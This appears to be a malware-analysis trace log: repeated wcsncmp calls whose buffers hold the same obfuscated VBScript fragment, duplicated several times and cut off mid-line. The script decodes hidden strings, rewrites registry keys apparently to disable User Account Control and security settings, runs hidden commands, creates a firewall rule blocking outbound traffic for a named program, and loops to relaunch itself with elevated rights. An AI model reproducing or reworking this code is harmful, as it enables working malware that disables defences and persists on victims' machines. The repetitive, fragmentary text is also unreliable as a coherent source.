bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.369] wcsncmp (_String1="wRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.369] wcsncmp (_String1="Rule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.369] wcsncmp (_String1="ule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.369] wcsncmp (_String1="le.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.369] wcsncmp (_String1="e.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 